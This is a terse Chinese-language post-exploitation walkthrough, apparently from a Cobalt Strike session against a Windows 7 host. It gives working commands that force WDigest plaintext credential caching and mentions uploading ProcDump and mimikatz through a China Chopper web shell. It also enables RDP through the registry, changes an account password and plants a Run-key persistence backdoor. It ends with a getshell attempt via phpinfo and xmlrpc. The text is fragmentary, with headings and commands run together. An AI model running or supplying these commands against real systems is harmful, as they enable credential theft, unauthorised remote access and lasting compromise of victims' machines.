修改注册表
beacon> shell reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f上传ProcDump
菜刀上传mimikatz
查看当前win7用户信息
修改账户密码
进行远程登录
查看3389端口
beacon> shell REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
开启3389
beacon> shell REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
远程登录
win7持久后门之注册表 shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "calm" /t REG_SZ /d "C:\Users\calmness\calmnexx.exe" /f或者
getshell通过访问目标地址,进行抓包。
对phpinfo进行漏洞攻击,发现xmlrpc
进行分析